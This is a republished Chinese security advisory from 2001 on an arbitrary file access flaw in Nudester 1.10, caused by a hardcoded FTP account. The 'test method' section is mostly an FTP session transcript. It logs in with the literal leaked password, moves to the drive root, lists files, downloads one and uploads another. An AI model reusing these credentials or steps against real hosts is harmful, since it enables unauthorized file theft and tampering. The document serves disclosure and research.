Nudester 未经授权的任意文件访问漏洞
发布日期:2001-08-17
更新日期:2001-08-20
受影响系统:
描述:
Nudester.org Nudester 1.10
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows 2000
BUGTRAQ ID:3202
用户从Nudester主机下载文件时,可能获得该主机的帐号和密码,利用这个帐号和密
码,攻击者可能从主机的任何位置下载文件或者是把文件上载到主机的任何位置。
利用这个漏洞,攻击者可能获得对该主机的完全控制。
<*来源:Gary (Cyph3r@phreaker.net)*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
ftp> open ***.***.***.***
Connected to ***.***.***.***
220 ICS FTP Server ready.
User (***.***.***.***:(none)): NUDESTER
331 Password required for NUDESTER.
Password: NSASTdfg!"#.%&sd3214894231SDFGSD598502534
230 User NUDESTER logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
C:\TEMP\*.* not found
226 File sent ok
ftp: 23 bytes received in 0.04Seconds 0.57Kbytes/sec.
ftp> cd ..
250 CWD command successful. "C:/" is current directory.
ftp> DIR
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 1152 Oct 30 2000 FRUNLOG.TXT
-rwxrwxrwx 1 ftp ftp 25473 May 15 1998 MSCDEX.EXE
-rw-rw-rw- 1 ftp ftp 10604 May 15 1997 CDROM.SYS
-rwxrwxrwx 1 ftp ftp 20135 May 15 1998 KEYB.COM
-rw-rw-rw- 1 ftp ftp 34566 May 15 1998 KEYBOARD.SYS
-rwxrwxrwx 1 ftp ftp 71102 May 15 1998 EDIT.COM
-rw-rw-rw- 1 ftp ftp 38 Oct 16 1998 AUTOEXEC.OLD
-rw-rw-rw- 1 ftp ftp 31 Oct 16 1998 CONFIG.OLD
drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 ATI
-rw-rw-rw- 1 ftp ftp 121 Oct 29 2000 CONFIG.DOS
-rw-rw-rw- 1 ftp ftp 113 Oct 29 2000 AUTOEXEC.DOS
-rw-rw-rw- 1 ftp ftp 436 Nov 18 2000 AUTOEXEC.BAK
drw-rw-rw- 1 ftp ftp 0 Oct 29 2000 WINDOWS
drw-rw-rw- 1 ftp ftp 0 Oct 30 2000 WINDOWS.000
-rw-rw-rw- 1 ftp ftp 7471 Nov 18 2000 NETLOG.TXT
-rw-rw-rw- 1 ftp ftp 172 Nov 15 2000 CONFIG.BAK
-rw-rw-rw- 1 ftp ftp 5048 Nov 17 2000 SETUPXLG.TXT
-rwxrwxrwx 1 ftp ftp 438 Aug 16 00:43 AUTOEXEC.BAT
dr--r--r-- 1 ftp ftp 0 Oct 29 2000 Program Files
-rw-rw-rw- 1 ftp ftp 172 Nov 18 2000 CONFIG.SYS
-rw-rw-rw- 1 ftp ftp 19622 Aug 10 18:50 SCANDISK.LOG
-rw-rw-rw- 1 ftp ftp 327 Oct 30 2030 outreg.txt
-rw-rw-rw- 1 ftp ftp 339 Oct 30 2030 outreg.ini
drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 dcpt
-rwxrwxrwx 1 ftp ftp 17129 Oct 30 2030 BOOTDISK.EXE
-rwxrwxrwx 1 ftp ftp 2884286 Oct 30 2030 DECOMP.EXE
-rwxrwxrwx 1 ftp ftp 265420 Oct 30 2030 DOS4GW.EXE
-rw-rw-rw- 1 ftp ftp 507 Oct 30 2030 FILE_ID.DIZ
-rw-rw-rw- 1 ftp ftp 2086 Oct 30 2030 HELPME.DOC
-rw-rw-rw- 1 ftp ftp 3639 Oct 30 2030 LICENSE.DOC
-rw-rw-rw- 1 ftp ftp 1377 Oct 30 2030 ORDER.DOC
drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 KPCMS
-rw-rw-rw- 1 ftp ftp 386 Nov 02 2000 AUTOEXEC.001
drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 psfonts
-rw-rw-rw- 1 ftp ftp 25 Nov 03 2000 prompt
-rwxrwxrwx 1 ftp ftp 95874 May 05 1999 COMMAND.COM
drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Winzip
drw-rw-rw- 1 ftp ftp 0 Dec 10 2000 unzipped
drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Antivirus
drw-rw-rw- 1 ftp ftp 0 Dec 16 2000 My Music
-rw-rw-rw- 1 ftp ftp 118 Jan 20 00:27 netsig.txt
drw-rw-rw- 1 ftp ftp 0 Mar 15 21:05 accelerator
-rw-rw-rw- 1 ftp ftp 22721 Aug 17 01:00 winzip.log
226 File sent ok
ftp: 4652 bytes received in 5.64Seconds 0.83Kbytes/sec.
- 尝试下载一个文件
ftp> get netsig.txt
200 Port command successful.
150 Opening data connection for netsig.txt.
226 File sent ok
ftp: 118 bytes received in 0.00Seconds 118000.00Kbytes/sec.
- 尝试上传一个文件
ftp> put c:\temp.txt
200 Port command successful.
150 Opening data connection for TEMP.TXT.
226 File received ok
建议:
厂商补丁:
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
